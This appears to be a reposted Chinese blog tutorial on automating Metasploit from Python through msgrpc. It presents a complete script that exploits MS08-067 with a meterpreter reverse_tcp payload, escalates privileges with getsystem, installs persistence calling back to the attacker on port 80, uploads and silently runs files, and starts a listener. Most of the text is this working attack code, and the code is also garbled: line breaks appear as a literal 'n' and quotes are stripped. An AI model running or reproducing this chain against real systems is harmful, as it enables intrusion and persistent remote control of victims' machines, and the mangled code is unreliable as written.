0xA:Python版的Metasploit
##Python版的Metasploit
pymsf模塊是Spiderlabs實現的一個python與Metasploit的msgrpc通信的python模塊,但首先你需要先啟動msgrpc服務,命令如下:
load msgrpc Pass=<password>n
與msgrpc進行通信其實就是與msfconsole進行通信,首先你需要創建一個msfrpc的類,登錄到msgrpc伺服器並且創建一個虛擬的終端,然後你就可以在你創建的虛擬終端上面執行多個命令的字元串.你可以調用模塊的方法與console.write執行命令,並且通過"console.read"從虛擬終端上面讀取輸入的值.這篇文章將演示如何使用pymsf模塊並且如何開發出一個完整的腳本.
這裡有一個函數它創建了一個msfrpc實例,登錄到msgrpc伺服器,並且創建了一個虛擬終端.
def sploiter(RHOST, LHOST, LPORT, session):n client = msfrpc.Msfrpc({})n client.login(msf, 123)n ress = client.call(console.create)n console_id = ress[id]n
下一步就是實現把多個字元串發給虛擬終端,通過console.write和console.read在虛擬終端顯示與讀取:
## Exploit MS08-067 ##ncommands = """use exploit/windows/smb/ms08_067_netapinset PAYLOAD windows/meterpreter/reverse_tcpnset RHOST """+RHOST+"""nset LHOST """+LHOST+"""nset LPORT """+LPORT+"""nset ExitOnSession falsenexploit -zn"""nprint "[+] Exploiting MS08-067 on: "+RHOSTnclient.call(console.write,[console_id,commands])nres = client.call(console.read,[console_id])nresult = res[data].split(n)n
上面的這一小段代碼創建了一個MSF的資源文件,這樣你就可以通過"resoucen "命令去執行指定文件裡面中一系列的命令.下面我們將通過"getsystem"命令把這個文件的提權,建立一個後門打開80埠來轉發.並且永久的運行.最後上傳我們的漏洞exp並且在命令模式下面悄悄的安裝:
# 這個函數會創建一個MSF .rc文件ndef builder(RHOST, LHOST, LPORT):n post = open(/tmp/smbpost.rc, w)n bat = open(/tmp/ms08067_install.bat, w)n n postcomms = """getsystemnrun persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""ncd c:nupload /tmp/ms08067_patch.exe c:nupload /tmp/ms08067_install.bat c:nexecute -f ms08067_install.batn"""n batcomm = "ms08067_patch.exe /quiet"n post.write(postcomms); bat.write(batcomm)n post.close(); bat.close()n
通過上面的那段代碼,將會創建一個.rc的文件.通過msf模塊「post/multi/gather/run_console_rc_file」在當前的meterpreter會話中運行生成的文件,並且通過console.write命令從虛擬終端寫入數據,通過console.read命令來回顯返回內容:
## 運行生成的exp ##nrunPost = """use post/multi/gather/run_console_rc_filenset RESOURCE /tmp/smbpost.rcnset SESSION """+session+"""nexploitn"""n print "[+] Running post-exploit script on: "+RHOSTn client.call(console.write,[console_id,runPost])n rres = client.call(console.read,[console_id])n## Setup Listener for presistent connection back over port 80 ##n sleep(10)n listen = """use exploit/multi/handlernset PAYLOAD windows/meterpreter/reverse_tcpnset LPORT 80nset LHOST """+LHOST+"""nexploitn"""nprint "[+] Setting up listener on: "+LHOST+":80"nclient.call(console.write,[console_id,listen])nlres = client.call(console.read,[console_id])nprint lresn
上面代碼中的變數(RHOST, LHOST, LPORT等)都是通過optparse模塊從命令終端輸入的,完整的腳本託管在github上面,有時候你需要知道腳本的生成的地方都是靜態地址,不會在其他的目錄生成,例如ms08067的補丁就會在你的/tmp/目錄下面。大家只要知道基礎然後對下面的代碼進行一定的修改就可以編程一個屬於你自己的msf自動化攻擊腳本,我們建議通過博客裡面發表的一些簡單的例子出發,然後自己寫一個msf攻擊腳本:
import os, msfrpc, optparse, sys, subprocessnfrom time import sleepn n# Function to create the MSF .rc filesndef builder(RHOST, LHOST, LPORT):n post = open(/tmp/smbpost.rc, w)n bat = open(/tmp/ms08067_install.bat, w)n n postcomms = """getsystemnrun persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""ncd c:nupload /tmp/ms08067_patch.exe c:nupload /tmp/ms08067_install.bat c:nexecute -f ms08067_install.batn"""n batcomm = "ms08067_patch.exe /quiet"n post.write(postcomms); bat.write(batcomm)n post.close(); bat.close()n n# Exploits the chain of rc files to exploit MS08-067, setup persistence, and patchndef sploiter(RHOST, LHOST, LPORT, session):n client = msfrpc.Msfrpc({})n client.login(msf, 123)n ress = client.call(console.create)n console_id = ress[id]n n## Exploit MS08-067 ##n commands = """use exploit/windows/smb/ms08_067_netapinset PAYLOAD windows/meterpreter/reverse_tcpnset RHOST """+RHOST+"""nset LHOST """+LHOST+"""nset LPORT """+LPORT+"""nset ExitOnSession falsenexploit -zn"""n print "[+] Exploiting MS08-067 on: "+RHOSTn client.call(console.write,[console_id,commands])n res = client.call(console.read,[console_id])n result = res[data].split(n)n n## Run Post-exploit script ##n runPost = """use post/multi/gather/run_console_rc_filenset RESOURCE /tmp/smbpost.rcnset SESSION """+session+"""nexploitn"""n print "[+] Running post-exploit script on: "+RHOSTn client.call(console.write,[console_id,runPost])n rres = client.call(console.read,[console_id])n## Setup Listener for presistent connection back over port 80 ##n sleep(10)n listen = """use exploit/multi/handlernset PAYLOAD windows/meterpreter/reverse_tcpnset LPORT 80nset LHOST """+LHOST+"""nexploitn"""n print "[+] Setting up listener on: "+LHOST+":80"n client.call(console.write,[console_id,listen])n lres = client.call(console.read,[console_id])n print lresn ndef main():n parser = optparse.OptionParser(sys.argv[0] +n -p LPORT -r RHOST -l LHOST)n parser.add_option(-p, dest=LPORT, type=string, n help =specify a port to listen on)n parser.add_option(-r, dest=RHOST, type=string, n help=Specify a remote host)n parser.add_option(-l, dest=LHOST, type=string, n help=Specify a local host)n parser.add_option(-s, dest=session, type=string, n help =specify session ID)n (options, args) = parser.parse_args()n session=options.sessionn RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORTn n if (RHOST == None) and (LPORT == None) and (LHOST == None):n print parser.usagen sys.exit(0)n n builder(RHOST, LHOST, LPORT)n sploiter(RHOST, LHOST, LPORT, session)n nif __name__ == "__main__":n main()n n
推薦閱讀:
※Python面向對象編程(OOP)
※Python課件的中文版
※Python內置常量
※草根學Python(八) 模塊與包
TAG:Python教程 |